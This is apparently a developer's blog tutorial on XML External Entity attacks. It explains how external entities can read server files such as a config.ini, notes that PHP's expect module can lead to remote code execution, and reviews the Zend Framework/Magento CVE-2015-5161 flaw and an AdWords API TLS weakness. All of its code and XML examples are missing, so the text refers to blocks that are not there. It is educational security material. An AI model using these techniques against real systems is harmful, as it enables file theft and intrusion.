How to hack #4 – XML External Entity Processing

Introduction

Today, we use XML files over JSON because of old, legacy applications which support communication only using XML files (for example SOAP) or because the XML Schema which is much more adult than JSON Schema or Swagger. Or you like XML or… you use Java! Anyway, regardless of the reason for your decision using this standard may be dangerous and today I want to show you one of the attacks called XML External Entity Processing (XEE).

Simple example

Let’s say we give possibility to upload an XML file similar to the one below

Our script which handles the XML file is:

Very simple, isn’t it? We just get the input, parse it and display the product’s name. What can go wrong? Let’s take a step backward and take a look at XML Entities. There are 3 types of XML entity declarations: internal (parsed), external (parsed) and external (unparsed). We will be interested in the last one.

A very simple syntax of the Entities is showed below

Simplifying, the entities are like variables. We can put a static text there or try to load it from some other source. What can be the source? Any file accessible from the internet or file from the local filesystem. Can you see what I am going to do? 🙂

We have an application which handles the XML we provide and displays name of a product which was just imported. Let’s try to read configuration. The configuration file is called config.ini. To load any file in filesystem where the script has access we can use syntax as below

Thanks to SYSTEM directive you can read any file. Firstly, let’s try to load the configuration file. Ready XML is available below:

In my case, the script returns output as below:

Cool, isn’t it?! That’s not all because we can read ANY file where the web server has access to.

If you have “expect” module installed in PHP you can get RCE (Remote Code Execution) which gives much more possibilities to escalate vectors of attacks and give you full control over the application.

Moreover, we can reproduce the same vulnerability in other languages like Java:

So no one can sleep peacefully today…

Some real vulnerabilities

That was a theory. And may be boring… I’ll show you some real examples.

Magento

Do you know Magento? Magento is one of the most popular e-commerce platform written with PHP with thousands of downloads. Magento uses Zend Framework (ZF) as main library which provides lot’s of usefull libraries and classes. Unfortunatelly, in ZF/Xml component a vulnerability was found which affected Magento CE <= 1.9.2.1 and Magento EE <= 1.14.2.1. The vulnerability was found in ZendFramework-1.12.13/library/Zend/Xml/Security.php and ZendFramework-2.4.2/library/ZendXml/Security.php. The whole exploid can be found below:

The author of the CVE-2015-5161 wrote:

As we can see from the code, the application disables the entity loader
(via libxml_disable_entity_loader), it also disables network access
(LIBXML_NONET), and it additionally scans provided XML for the presence of XML
entities to prevent potential entity expansion attacks.
The code succesfully prevents most XXE attacks.

However, as the PHP libxml_disable_entity_loader() function was reported not thread safe (the entity loader setting could potentially get overwritten between hits in FPM processes), Zend Framework does not use it when the application is hosted in a PHP-FPM environment. Instead, another approach is taken to prevent the XXE attacks.

What’s worth to stress that all libraries or applications which use the ZF component were affected.

Google AdWords API

Another problem was found in Google AdWords API. What is it? “The AdWords API allows apps to interact directly with the AdWords platform, vastly increasing the efficiency of managing large or complex AdWords accounts and campaigns”.

For security reasons, Google AdWords API can only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the https:// stream context. It fails to assign Certificate Authority (CA),
and turn the verify_peer option to ON.
It uses the stream_context_get_default() to get the default context,
which on all PHP versions below PHP 5.6.x (see references below) does not
validate the CA by default.

Because of this, applications using the AdWords API library may be tricked into retrieving data from untrusted sources pretending to be adwords.google.com.

The vulnerability was found in the code below:

To exploit the application you have to use another attack called Man In The Middle.

Summary

XML files are very popular, JSON or YAML formats cannot threaten him. However, (as always) we need to be careful with it because the vector of attack can come from almost any direction. Do you know any other ways to attack XML format/parsers? Share with it in the comments!

About author

Hi! I am Bartek. I'm a PHP developer but I other languages are not scary to me. My hobby is security and I try to learn as much as it's possible how to not be hacked. I like to know how things work. After hours I like playing Dota2 :)